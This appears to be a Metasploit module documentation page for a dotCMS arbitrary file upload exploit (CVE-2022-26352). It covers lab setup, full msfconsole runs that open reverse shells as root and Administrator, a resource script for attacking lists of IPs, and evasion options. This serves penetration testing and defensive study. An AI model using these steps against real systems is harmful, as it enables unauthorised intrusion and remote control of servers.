DotCMS RCE via Arbitrary File Upload. - Metasploit
This page contains detailed information about how to use the exploit/multi/http/dotcms_file_upload_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
- Module Overview
- Knowledge Base
- Vulnerable Application
- Description
- Clone and build a vulnerable version of dotCMS:
- Ubuntu 20.04 install
- Install JAVA 1.8
- Install Postgres
- Install Elastic Search
- Run dotCMS
- Windows 10 install
- Install Java 1.8
- Install Elasticsearch 8.2.0
- Install Postgres 10.21
- Run dotCMS
- Verification Steps
- Scenarios
- Msfconsole Usage
- Error Messages
- Related Pull Requests
- References
- See Also
- Authors
- Version
Module Overview
Name: DotCMS RCE via Arbitrary File Upload.
Module: exploit/multi/http/dotcms_file_upload_rce
Source code: modules/exploits/multi/http/dotcms_file_upload_rce.rb
Disclosure date: 2022-05-03
Last modification time: 2022-06-01 10:54:02 +0000
Supported architecture(s): -
Supported platform(s): Linux, Windows
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-26352
When files are uploaded into dotCMS via the content API, but before they become content, dotCMS writes the file down in a temp directory. In the case of this vulnerability, dotCMS does not sanitize the filename passed in via the multipart request header and thus does not sanitize the temp file's name. This allows a specially crafted request to POST files to dotCMS via the ContentResource (POST /api/content) that get written outside of the dotCMS temp directory. In the case of this exploit, an attacker can upload a special .jsp file to the webapp/ROOT directory of dotCMS which can allow for remote code execution.
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Reliability:
- repeatable-session: The module is expected to get a shell every time it runs.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
Using dotcms_file_upload_rce against a single host
Normally, you can use exploit/multi/http/dotcms_file_upload_rce this way:
msf > use exploit/multi/http/dotcms_file_upload_rce
msf exploit(dotcms_file_upload_rce) > show targets
... a list of targets ...
msf exploit(dotcms_file_upload_rce) > set TARGET target-id
msf exploit(dotcms_file_upload_rce) > show options
... show and set options ...
msf exploit(dotcms_file_upload_rce) > exploit
Using dotcms_file_upload_rce against multiple hosts
But it looks like this is a remote exploit module, which means you can also engage multiple hosts.
First, create a list of IPs you wish to exploit with this module. One IP per line.
Second, set up a background payload listener. This payload should be the same as the one your dotcms_file_upload_rce will be using:
- Do:
use exploit/multi/handler
- Do:
set PAYLOAD [payload]
- Set other options required by the payload
- Do:
set EXITONSESSION false
- Do:
run -j
At this point, you should have a payload listening.
Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:
<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'
File.open(ip_list, 'rb').each_line do |ip|
print_status("Trying against #{ip}")
run_single("use exploit/multi/http/dotcms_file_upload_rce")
run_single("set RHOST #{ip}")
run_single("set DisablePayloadHandler true")
#
# Set a payload that's the same as the handler.
# You might also need to add more run_single commands to configure other
# payload options.
#
run_single("set PAYLOAD [payload name]")
run_single("run")
end
</ruby>
Next, run the resource script in the console:
msf > resource [path-to-resource-script]
And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:
msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80
RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600
[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600
Required Options
- RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
Knowledge Base
Vulnerable Application
Description
This module exploits an arbitrary file upload vulnerability in dotCMS versions before 22.03, 5.3.8.10, 21.06.7 in each respective stream. The module uploads a jsp payload to the tomcat ROOT directory and accesses it to trigger its execution.
Clone and build a vulnerable version of dotCMS:
This requires Java 1.8 to be installed and JAVA_HOME to be set (see below for per OS instructions).
1. git clone https://github.com/dotCMS/core.git
1. cd core
1. git checkout 7d604e5 (this is vulnerable version 21.06)
1. cd dotCMS/
1. ./gradlew createDist
Starting a Gradle Daemon (subsequent builds will be faster)
<output truncated>
BUILD SUCCESSFUL in 12m 53s
21 actionable tasks: 19 executed, 2 up-to-date
If the build was successful you should now have a vulnerable 21.06 linux and windows instance:
msfuser@ubuntu:~/core/dotCMS$ ls -l ../dist-output/
total 811132
-rw-rw-r-- 1 msfuser msfuser 413134562 May 20 10:22 dotcms_21.06.tar.gz
-rw-rw-r-- 1 msfuser msfuser 417462181 May 20 10:24 dotcms_21.06.zip
Inside each of the above compressed directories exists a directory dotserver
which contains the vulnerable app.
Ubuntu 20.04 install
Install JAVA 1.8
export JAVA_HOME="/usr/lib/jvm/java-8-openjdk-amd64"
export PATH=$JAVA_HOME/bin:$PATH
sudo apt-get install openjdk-8-jdk
Install Postgres
sudo apt install postgresql -y
sudo -u postgres psql
- Change the default database, username and password from
dotcms
topostgres
(or create the db and userdotcms
). vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/db.properties
##Postgres default configuration driverClassName=org.postgresql.Driver jdbcUrl=jdbc:postgresql://localhost/postgres username=postgres password=postgres
Install Elastic Search
sudo apt install apt-transport-https ca-certificates wget
wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -
sudo sh -c 'echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" > /etc/apt/sources.list.d/elastic-7.x.list'
sudo apt update
sudo apt install elasticsearch
sudo systemctl daemon-reload
sudo systemctl enable elasticsearch.service
sudo systemctl start elasticsearch.service
sudo systemctl status elasticsearch.service
- Edit
dotcms-config-cluster.properties
to ensure the following properties are set: vim $DOTCMS_HOME/dotserver/tomcat-9.0.41/webapps/ROOT/WEB-INF/classes/dotcms-config-cluster.properties
ES_ENDPOINTS=http://localhost:9200
ES_PROTOCOL=http ES_HOSTNAME=localhost ES_PORT=9200
ES_TLS_ENABLED=false
Run dotCMS
cd dotserver/tomcat-9.0.41/bin/
chmod 755 *.sh
catalina.sh run
- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Windows 10 install
Install Java 1.8
- Download and follow wizard to install: https://www.oracle.com/java/technologies/downloads/#license-lightbox
Install Elasticsearch 8.2.0
Download and follow wizard to install: https://artifacts.elastic.co/downloads/elasticsearch/elasticsearch-8.2.0-windows-x86_64.zip dotcms-config-cluster.properties 1. Ensure dotcms-config-cluster.properties contains the same properties as specified above
Install Postgres 10.21
- Download and follow wizard to install: https://www.enterprisedb.com/postgresql-tutorial-resources-training?uuid=ea5c8104-3940-4ed1-b427-81cf19781581&campaignId=70138000000rYFmAAM
- Ensure db.properties contains the same properties as specified above
Run dotCMS
cd dotserver\tomcat-9.0.41\bin\
catalina.bat run
- Test the server is up with:
curl -vk localhost:8080/dotAdmin/
Verification Steps
use multi/http/dotcms_file_upload_rce
set RHOSTS [ips]
set LHOST [ips]
run
Scenarios
Ubuntu 20.04 dotCMS 21.06:
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.227
rhosts => 172.16.199.227
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[+] Deleted ../webapps/ROOT/XZhKXIssjD.jsp
[+] Deleted ../webapps/ROOT/M4NYE9Kb.jsp
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.227:39610) at 2022-05-20 15:01:25 -0400
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
Linux ubuntu 5.13.0-41-generic #46~20.04.1-Ubuntu SMP Wed Apr 20 13:16:21 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
Windows 10 dotCMS 21.06:
msf6 > use dotcms_file_upload_rce
[*] Using exploit/multi/http/dotcms_file_upload_rce
msf6 exploit(multi/http/dotcms_file_upload_rce) > set rhosts 172.16.199.231
rhosts => 172.16.199.231
msf6 exploit(multi/http/dotcms_file_upload_rce) > set lhost 172.16.199.1
lhost => 172.16.199.1
msf6 exploit(multi/http/dotcms_file_upload_rce) > run
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Writing JSP payload
[+] Successfully wrote JSP payload
[*] Executing JSP payload
[+] Successfully executed JSP payload
[!] Tried to delete ../webapps/ROOT/AkqMhxCZWr.jsp, unknown result
[!] Tried to delete ../webapps/ROOT/xdPfn9JTdu33X.jsp, unknown result
[*] Command shell session 1 opened (172.16.199.1:4444 -> 172.16.199.231:50016) at 2022-05-20 12:41:36 -0400
Shell Banner:
Microsoft Windows [Version 10.0.19042.1706]
(c) Microsoft Corporation. All rights reserved.
-----
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>whoami
whoami
desktop-h1lncdm\administrator
C:\Users\Administrator\Downloads\dotcms_21.06\dotserver\tomcat-9.0.41\bin>systeminfo
systeminfo
Host Name: DESKTOP-H1LNCDM
OS Name: Microsoft Windows 10 Pro
OS Version: 10.0.19042 N/A Build 19042
<output truncated>
Note on windows the module reports an unknown result when trying to delete the files though it does successfully
Go back to menu.
Msfconsole Usage
Here is how the multi/http/dotcms_file_upload_rce exploit module looks in the msfconsole:
msf6 > use exploit/multi/http/dotcms_file_upload_rce
[*] Using configured payload java/jsp_shell_reverse_tcp
msf6 exploit(multi/http/dotcms_file_upload_rce) > show info
Name: DotCMS RCE via Arbitrary File Upload.
Module: exploit/multi/http/dotcms_file_upload_rce
Platform: Linux, Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2022-05-03
Provided by:
Shubham Shah
Hussein Daher
jheysel-r7
Module side effects:
artifacts-on-disk
ioc-in-logs
Module stability:
crash-safe
Module reliability:
repeatable-session
Available targets:
Id Name
-- ----
0 Java Linux
1 Java Windows
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][.
..]
RHOSTS yes The target host(s), see https://github.com/rapid7/metaspl
oit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload information:
Description:
When files are uploaded into dotCMS via the content API, but before
they become content, dotCMS writes the file down in a temp
directory. In the case of this vulnerability, dotCMS does not
sanitize the filename passed in via the multipart request header and
thus does not sanitize the temp file's name. This allows a specially
crafted request to POST files to dotCMS via the ContentResource
(POST /api/content) that get written outside of the dotCMS temp
directory. In the case of this exploit, an attacker can upload a
special .jsp file to the webapp/ROOT directory of dotCMS which can
allow for remote code execution.
References:
https://nvd.nist.gov/vuln/detail/CVE-2022-26352
https://blog.assetnote.io/2022/05/03/hacking-a-bank-using-dotcms-rce/
Module Options
This is a complete list of options available in the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show options
Module options (exploit/multi/http/dotcms_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][
...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasp
loit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host
Payload options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
SHELL no The system shell to use.
Exploit target:
Id Name
-- ----
0 Java Linux
Advanced Options
Here is a complete list of advanced options supported by the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show advanced
Module advanced options (exploit/multi/http/dotcms_file_upload_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
AllowNoCleanup false no Allow exploitation without the possi
bility of cleaning up files
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains c
ontext information
DOMAIN WORKSTATION yes The domain to use for Windows authen
tication
DigestAuthIIS true no Conform to IIS, should work for most
servers. Only set to false for non-
IIS servers
DisablePayloadHandler false no Disable the handler code for the sel
ected payload
EnableContextEncoding false no Use transient context when encoding
payloads
FileDropperDelay no Delay in seconds before attempting c
leanup
FingerprintCheck true no Conduct a pre-exploit fingerprint ve
rification
ForceExploit false no Override check result
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for aut
hentication
HttpRawHeaders no Path to ERB-templatized raw headers
to append to existing headers
HttpTrace false no Show the raw HTTP requests and respo
nses
HttpTraceColors red/blu no HTTP request and response colors for
HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for aut
hentication
SSLServerNameIndicatio no SSL/TLS Server Name Indication (SNI)
n
SSLVersion Auto yes Specify the version of SSL/TLS to be
used (Auto, TLS and SSL23 are auto-
negotiate) (Accepted: Auto, TLS, SSL
23, SSL3, TLS1, TLS1.1, TLS1.2)
UserAgent Mozilla/5.0 (iPad; CPU no The User-Agent header to use for all
OS 15_3_1 like Mac OS requests
X) AppleWebKit/605.1.
15 (KHTML, like Gecko)
Version/15.2 Mobile/1
5E148 Safari/604.1
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this modul
e
WfsDelay 2 no Additional delay in seconds to wait
for a session
Payload advanced options (java/jsp_shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoRunScript no A script to run automatically on session cr
eation.
AutoVerifySession true yes Automatically verify and drop invalid sessi
ons
CommandShellCleanupCom no A command to run before the session is clos
mand ed
CreateSession true no Create a new session for every successful l
ogin
InitialAutoRunScript no An initial script to run on session creatio
n (before AutoRunScript)
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specifi
ed. Connect back will NOT go through proxy
but directly to LHOST
ReverseListenerBindAdd no The specific IP address to bind to on the l
ress ocal system
ReverseListenerBindPor no The port to bind to on the local system if
t different from LPORT
ReverseListenerComm no The specific communication channel to use f
or this listener
ReverseListenerThreade false yes Handle every connection in a new thread (ex
d perimental)
StagerRetryCount 10 no The number of times the stager should retry
if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager be
tween reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the multi/http/dotcms_file_upload_rce module can exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show targets
Exploit targets:
Id Name
-- ----
0 Java Linux
1 Java Windows
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the multi/http/dotcms_file_upload_rce exploit:
msf6 exploit(multi/http/dotcms_file_upload_rce) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/generic/ssh/interact normal No Interact with Established SSH Connection
4 payload/java/jsp_shell_bind_tcp normal No Java JSP Command Shell, Bind TCP Inline
5 payload/java/jsp_shell_reverse_tcp normal No Java JSP Command Shell, Reverse TCP Inline
Evasion Options
Here is the full list of possible evasion options supported by the multi/http/dotcms_file_upload_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(multi/http/dotcms_file_upload_rce) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::method_random_ca false no Use random casing for the HTTP method
se
HTTP::method_random_in false no Use a random invalid, HTTP method for reque
valid st
HTTP::method_random_va false no Use a random, but valid, HTTP method for re
lid quest
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP r
equest
HTTP::pad_fake_headers 0 no How many fake headers to insert into the HT
_count TP request
HTTP::pad_get_params false no Insert random, fake query string variables
into the request
HTTP::pad_get_params_c 16 no How many fake query string variables to ins
ount ert into the request
HTTP::pad_method_uri_c 1 no How many whitespace characters to use betwe
ount en the method and uri
HTTP::pad_method_uri_t space no What type of whitespace to use between the
ype method and uri (Accepted: space, tab, apach
e)
HTTP::pad_post_params false no Insert random, fake post variables into the
request
HTTP::pad_post_params_ 16 no How many fake post variables to insert into
count the request
HTTP::pad_uri_version_ 1 no How many whitespace characters to use betwe
count en the uri and version
HTTP::pad_uri_version_ space no What type of whitespace to use between the
type uri and version (Accepted: space, tab, apac
he)
HTTP::uri_dir_fake_rel false no Insert fake relative directories into the u
ative ri
HTTP::uri_dir_self_ref false no Insert self-referential directories into th
erence e uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-no
rmal, hex-noslashes, hex-random, hex-all, u
-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../
../)
HTTP::uri_fake_params_ false no Add a fake start of params to the URI (eg:
start /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslas false no Use back slashes instead of forward slashes
hes in the uri
HTTP::version_random_i false no Use a random invalid, HTTP version for requ
nvalid est
HTTP::version_random_v false no Use a random, but valid, HTTP version for r
alid equest
Go back to menu.
Error Messages
This module may fail with the following error messages:
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Failed to write JSP payload
Here is a relevant code snippet related to the "Failed to write JSP payload" error message:
133: 'uri' => normalize_uri(target_uri.path, '/api/content/'),
134: 'vars_form_data' => vars_form_data
135: )
136:
137: unless res&.code == 500
138: fail_with(Failure::NotVulnerable, 'Failed to write JSP payload')
139: end
140:
141: register_file_for_cleanup("../webapps/ROOT/#{jsp_filename}")
142: print_good('Successfully wrote JSP payload')
143: end
Failed to execute JSP payload
Here is a relevant code snippet related to the "Failed to execute JSP payload" error message:
149: 'method' => 'GET',
150: 'uri' => jsp_uri
151: )
152:
153: unless res&.code == 200
154: fail_with(Failure::PayloadFailed, 'Failed to execute JSP payload')
155: end
156: print_good('Successfully executed JSP payload')
157: end
158:
159: def exploit
Go back to menu.
Related Pull Requests
- #16650 Merged Pull Request: Add #read_from_file for MSSQL and PostgreSQL, fix the MySQL implementation
- #16602 Merged Pull Request: Fix error when service is already running and update exception documentation in lib/msf/core/post/windows/services.rb
- #16627 Merged Pull Request: Add some error handling to update_payload_cache_size script
- #16679 Merged Pull Request: Fix missing and incomplete specs
- #16654 Merged Pull Request: Add named pipe pivot documentation
- #16571 Merged Pull Request: Vcenter offline mdb extract
- #16667 Merged Pull Request: Weekly dependency updates for Gemfile.lock
- #16666 Merged Pull Request: Correctly format the notes sections
- #16665 Merged Pull Request: Fix random compile c tool
- #16662 Merged Pull Request: Add faraday retry gem dependency
References
See Also
Check also the following modules related to this module:
- exploit/multi/http/apache_jetspeed_file_upload
- exploit/multi/http/bolt_file_upload
- exploit/multi/http/clipbucket_fileupload_exec
- exploit/multi/http/coldfusion_ckeditor_file_upload
- exploit/multi/http/eventlog_file_upload
- exploit/multi/http/gitlab_file_read_rce
- exploit/multi/http/horde_form_file_upload
- exploit/multi/http/hp_sitescope_uploadfileshandler
- exploit/multi/http/jboss_deploymentfilerepository
- exploit/multi/http/monstra_fileupload_exec
- exploit/multi/http/nibbleblog_file_upload
- exploit/multi/http/opmanager_socialit_file_upload
- exploit/multi/http/oracle_ats_file_upload
- exploit/multi/http/phpfilemanager_rce
- exploit/multi/http/playsms_filename_exec
- exploit/multi/http/rocket_servergraph_file_requestor_rce
- exploit/multi/http/sit_file_upload
- exploit/multi/http/sysaid_auth_file_upload
- exploit/multi/http/sysaid_rdslogs_file_upload
- exploit/multi/http/uptime_file_upload_1
- exploit/multi/http/uptime_file_upload_2
- exploit/multi/http/webnms_file_upload
- exploit/multi/http/wp_dnd_mul_file_rce
- exploit/multi/http/wp_file_manager_rce
- exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload
- exploit/multi/http/wp_simple_file_list_rce
- exploit/multi/http/wso2_file_upload_rce
Authors
- Shubham Shah
- Hussein Daher
- jheysel-r7
Version
This page has been produced using Metasploit Framework version 6.2.4-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.